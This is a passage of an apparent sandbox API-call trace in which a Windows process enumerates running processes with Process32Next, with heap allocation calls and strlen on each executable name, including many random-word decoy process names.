Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.207] GetProcessHeap () returned 0x2b0000 [0221.207] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.207] GetProcessHeap () returned 0x2b0000 [0221.207] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.207] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.208] strlen (_Str="svchost.exe") returned 0xb [0221.209] GetProcessHeap () returned 0x2b0000 [0221.209] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.209] GetProcessHeap () returned 0x2b0000 [0221.209] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.209] GetProcessHeap () returned 0x2b0000 [0221.209] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.209] GetProcessHeap () returned 0x2b0000 [0221.209] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.209] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x300, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.226] strlen (_Str="explorer.exe") returned 0xc [0221.227] GetProcessHeap () returned 0x2b0000 [0221.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.227] GetProcessHeap () returned 0x2b0000 [0221.227] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.227] GetProcessHeap () returned 0x2b0000 [0221.227] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.228] GetProcessHeap () returned 0x2b0000 [0221.228] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2fbfc8, Size=0x540) returned 0x2d70c8 [0221.228] GetProcessHeap () returned 0x2b0000 [0221.228] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.228] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.229] strlen (_Str="dwm.exe") returned 0x7 [0221.229] GetProcessHeap () returned 0x2b0000 [0221.229] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.230] GetProcessHeap () returned 0x2b0000 [0221.230] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.230] GetProcessHeap () returned 0x2b0000 [0221.230] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.230] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.231] strlen (_Str="svchost.exe") returned 0xb [0221.231] GetProcessHeap () returned 0x2b0000 [0221.231] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.232] GetProcessHeap () returned 0x2b0000 [0221.232] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.232] GetProcessHeap () returned 0x2b0000 [0221.232] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.232] GetProcessHeap () returned 0x2b0000 [0221.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.232] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.233] strlen (_Str="spoolsv.exe") returned 0xb [0221.233] GetProcessHeap () returned 0x2b0000 [0221.233] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.234] GetProcessHeap () returned 0x2b0000 [0221.234] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.234] GetProcessHeap () returned 0x2b0000 [0221.234] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.234] GetProcessHeap () returned 0x2b0000 [0221.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.234] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.236] strlen (_Str="taskhost.exe") returned 0xc [0221.236] GetProcessHeap () returned 0x2b0000 [0221.236] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.236] GetProcessHeap () returned 0x2b0000 [0221.236] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.236] GetProcessHeap () returned 0x2b0000 [0221.236] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.236] GetProcessHeap () returned 0x2b0000 [0221.236] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.236] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.238] strlen (_Str="svchost.exe") returned 0xb [0221.238] GetProcessHeap () returned 0x2b0000 [0221.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.238] GetProcessHeap () returned 0x2b0000 [0221.238] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.238] GetProcessHeap () returned 0x2b0000 [0221.238] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.238] GetProcessHeap () returned 0x2b0000 [0221.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.239] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.240] strlen (_Str="OfficeClickToRun.exe") returned 0x14 [0221.240] GetProcessHeap () returned 0x2b0000 [0221.240] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.240] GetProcessHeap () returned 0x2b0000 [0221.240] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.240] GetProcessHeap () returned 0x2b0000 [0221.240] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.240] GetProcessHeap () returned 0x2b0000 [0221.240] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.241] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.242] strlen (_Str="WmiPrvSE.exe") returned 0xc [0221.243] GetProcessHeap () returned 0x2b0000 [0221.243] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.243] GetProcessHeap () returned 0x2b0000 [0221.243] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.243] GetProcessHeap () returned 0x2b0000 [0221.243] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.243] GetProcessHeap () returned 0x2b0000 [0221.243] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.243] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.244] strlen (_Str="svchost.exe") returned 0xb [0221.245] GetProcessHeap () returned 0x2b0000 [0221.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.245] GetProcessHeap () returned 0x2b0000 [0221.245] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.245] GetProcessHeap () returned 0x2b0000 [0221.245] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.245] GetProcessHeap () returned 0x2b0000 [0221.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.245] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0221.247] strlen (_Str="sppsvc.exe") returned 0xa [0221.247] GetProcessHeap () returned 0x2b0000 [0221.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.247] GetProcessHeap () returned 0x2b0000 [0221.247] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.247] GetProcessHeap () returned 0x2b0000 [0221.247] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.247] GetProcessHeap () returned 0x2b0000 [0221.248] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.248] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0221.249] strlen (_Str="iexplore.exe") returned 0xc [0221.249] GetProcessHeap () returned 0x2b0000 [0221.249] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.249] GetProcessHeap () returned 0x2b0000 [0221.249] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.249] GetProcessHeap () returned 0x2b0000 [0221.249] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.250] GetProcessHeap () returned 0x2b0000 [0221.250] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.250] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0221.251] strlen (_Str="iexplore.exe") returned 0xc [0221.251] GetProcessHeap () returned 0x2b0000 [0221.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.251] GetProcessHeap () returned 0x2b0000 [0221.251] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.251] GetProcessHeap () returned 0x2b0000 [0221.251] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.252] GetProcessHeap () returned 0x2b0000 [0221.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.252] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shake_help.exe")) returned 1 [0221.253] strlen (_Str="shake_help.exe") returned 0xe [0221.253] GetProcessHeap () returned 0x2b0000 [0221.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.253] GetProcessHeap () returned 0x2b0000 [0221.253] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.254] GetProcessHeap () returned 0x2b0000 [0221.254] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.254] GetProcessHeap () returned 0x2b0000 [0221.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.254] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="drop answer goal.exe")) returned 1 [0221.255] strlen (_Str="drop answer goal.exe") returned 0x14 [0221.255] GetProcessHeap () returned 0x2b0000 [0221.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.255] GetProcessHeap () returned 0x2b0000 [0221.255] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.255] GetProcessHeap () returned 0x2b0000 [0221.256] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.256] GetProcessHeap () returned 0x2b0000 [0221.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.256] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="season_sure_significant.exe")) returned 1 [0221.257] strlen (_Str="season_sure_significant.exe") returned 0x1b [0221.257] GetProcessHeap () returned 0x2b0000 [0221.257] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.257] GetProcessHeap () returned 0x2b0000 [0221.257] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.257] GetProcessHeap () returned 0x2b0000 [0221.257] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.258] GetProcessHeap () returned 0x2b0000 [0221.258] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x40) returned 0x2c79e0 [0221.258] GetProcessHeap () returned 0x2b0000 [0221.258] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c79e0 | out: hHeap=0x2b0000) returned 1 [0221.258] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="describe.exe")) returned 1 [0221.259] strlen (_Str="describe.exe") returned 0xc [0221.259] GetProcessHeap () returned 0x2b0000 [0221.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.267] GetProcessHeap () returned 0x2b0000 [0221.267] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.267] GetProcessHeap () returned 0x2b0000 [0221.267] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.267] GetProcessHeap () returned 0x2b0000 [0221.267] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.267] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="check can notice.exe")) returned 1 [0221.269] strlen (_Str="check can notice.exe") returned 0x14 [0221.269] GetProcessHeap () returned 0x2b0000 [0221.269] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.269] GetProcessHeap () returned 0x2b0000 [0221.269] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.269] GetProcessHeap () returned 0x2b0000 [0221.269] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.269] GetProcessHeap () returned 0x2b0000 [0221.269] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.269] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x978, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="between.exe")) returned 1 [0221.270] strlen (_Str="between.exe") returned 0xb [0221.271] GetProcessHeap () returned 0x2b0000 [0221.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.271] GetProcessHeap () returned 0x2b0000 [0221.271] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.271] GetProcessHeap () returned 0x2b0000 [0221.271] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.271] GetProcessHeap () returned 0x2b0000 [0221.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.271] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="also possible nearly.exe")) returned 1 [0221.277] strlen (_Str="also possible nearly.exe") returned 0x18 [0221.278] GetProcessHeap () returned 0x2b0000 [0221.278] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.278] GetProcessHeap () returned 0x2b0000 [0221.278] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.278] GetProcessHeap () returned 0x2b0000 [0221.278] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.278] GetProcessHeap () returned 0x2b0000 [0221.279] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.279] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot.exe")) returned 1 [0221.280] strlen (_Str="shoot.exe") returned 0x9 [0221.280] GetProcessHeap () returned 0x2b0000 [0221.280] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.280] GetProcessHeap () returned 0x2b0000 [0221.280] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.280] GetProcessHeap () returned 0x2b0000 [0221.280] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.281] GetProcessHeap () returned 0x2b0000 [0221.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.281] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="some.exe")) returned 1 [0221.282] strlen (_Str="some.exe") returned 0x8 [0221.282] GetProcessHeap () returned 0x2b0000 [0221.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.282] GetProcessHeap () returned 0x2b0000 [0221.282] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.283] GetProcessHeap () returned 0x2b0000 [0221.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.283] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="write.exe")) returned 1 [0221.284] strlen (_Str="write.exe") returned 0x9 [0221.284] GetProcessHeap () returned 0x2b0000 [0221.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.284] GetProcessHeap () returned 0x2b0000 [0221.284] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.285] GetProcessHeap () returned 0x2b0000 [0221.285] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.285] GetProcessHeap () returned 0x2b0000 [0221.285] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.285] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="collection-walk.exe")) returned 1 [0221.286] strlen (_Str="collection-walk.exe") returned 0x13 [0221.286] GetProcessHeap () returned 0x2b0000 [0221.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.286] GetProcessHeap () returned 0x2b0000 [0221.286] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.286] GetProcessHeap () returned 0x2b0000 [0221.287] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.287] GetProcessHeap () returned 0x2b0000 [0221.287] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.287] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="something-disease.exe")) returned 1 [0221.288] strlen (_Str="something-disease.exe") returned 0x15 [0221.288] GetProcessHeap () returned 0x2b0000 [0221.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.288] GetProcessHeap () returned 0x2b0000 [0221.288] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.288] GetProcessHeap () returned 0x2b0000 [0221.289] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.289] GetProcessHeap () returned 0x2b0000 [0221.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.289] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nextregioncitizen.exe")) returned 1 [0221.290] strlen (_Str="nextregioncitizen.exe") returned 0x15 [0221.290] GetProcessHeap () returned 0x2b0000 [0221.290] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.290] GetProcessHeap () returned 0x2b0000 [0221.290] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.291] GetProcessHeap () returned 0x2b0000 [0221.291] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.291] GetProcessHeap () returned 0x2b0000 [0221.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.291] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, 